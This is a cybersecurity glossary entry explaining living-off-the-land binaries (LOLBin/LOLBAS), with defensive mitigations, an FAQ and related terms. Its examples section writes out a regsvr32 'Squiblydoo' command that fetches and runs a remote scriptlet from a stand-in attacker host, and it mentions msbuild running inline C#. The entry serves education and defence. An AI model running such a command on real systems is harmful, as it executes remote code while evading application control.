LOLBin / LOLBAS
What is LOLBin / LOLBAS?
LOLBin / LOLBASA signed, native binary or script (LOLBin/LOLBAS) that attackers misuse for execution, download, persistence, or bypass while looking like a legitimate admin tool.
LOLBin (Living-Off-the-Land Binary) and the broader LOLBAS (Living-Off-the-Land Binaries And Scripts) project catalogue Microsoft-signed binaries, scripts, and libraries that have side-effects useful for offensive operations, such as executing arbitrary code, downloading remote payloads, or bypassing application control. Common examples include rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe, and certutil.exe. Because each tool is signed and trusted, defenders cannot simply blocklist by hash; they must understand expected vs. abnormal command lines. LOLBASs underpin many MITRE ATT&CK execution and defense-evasion techniques. Mitigations rely on application control allow-listing, ScriptBlock and process-creation logging, ASR rules, and EDR behavioural analytics.
● Examples
- 01
regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll (Squiblydoo).
- 02
msbuild.exe payload.xml to run inline C# without touching disk.
● Frequently asked questions
What is LOLBin / LOLBAS?
A signed, native binary or script (LOLBin/LOLBAS) that attackers misuse for execution, download, persistence, or bypass while looking like a legitimate admin tool. It belongs to the Attacks & Threats category of cybersecurity.
What does LOLBin / LOLBAS mean?
A signed, native binary or script (LOLBin/LOLBAS) that attackers misuse for execution, download, persistence, or bypass while looking like a legitimate admin tool.
How does LOLBin / LOLBAS work?
LOLBin (Living-Off-the-Land Binary) and the broader LOLBAS (Living-Off-the-Land Binaries And Scripts) project catalogue Microsoft-signed binaries, scripts, and libraries that have side-effects useful for offensive operations, such as executing arbitrary code, downloading remote payloads, or bypassing application control. Common examples include rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe, and certutil.exe. Because each tool is signed and trusted, defenders cannot simply blocklist by hash; they must understand expected vs. abnormal command lines. LOLBASs underpin many MITRE ATT&CK execution and defense-evasion techniques. Mitigations rely on application control allow-listing, ScriptBlock and process-creation logging, ASR rules, and EDR behavioural analytics.
How do you defend against LOLBin / LOLBAS?
Defences for LOLBin / LOLBAS typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for LOLBin / LOLBAS?
Common alternative names include: LOLBAS, Living-off-the-Land Binary.
● Related terms
- attacks№ 616
Living off the Land
An attacker tradecraft style that abuses legitimate, pre-installed tools and scripts on a victim system instead of dropping custom malware.
- malware№ 417
Fileless Malware
Malware that runs primarily in memory and leverages trusted system tools, avoiding the use of traditional executable files on disk.
- defense-ops№ 298
Defense Evasion
The MITRE ATT&CK tactic (TA0005) covering techniques attackers use to avoid detection, disable security tools, and hide their activity on a target system.
- defense-ops№ 371
EDR (Endpoint Detection and Response)
An endpoint security technology that continuously records process, file, registry and network activity to detect, investigate and respond to threats on hosts.
- defense-ops№ 682
Mimikatz
An open-source Windows post-exploitation tool that extracts plaintext passwords, hashes, Kerberos tickets, and other credentials from memory and LSASS.
- attacks№ 045
AMSI Bypass
Techniques that disable, patch, or evade the Windows Antimalware Scan Interface so that scripts and in-memory payloads are not inspected by antivirus engines.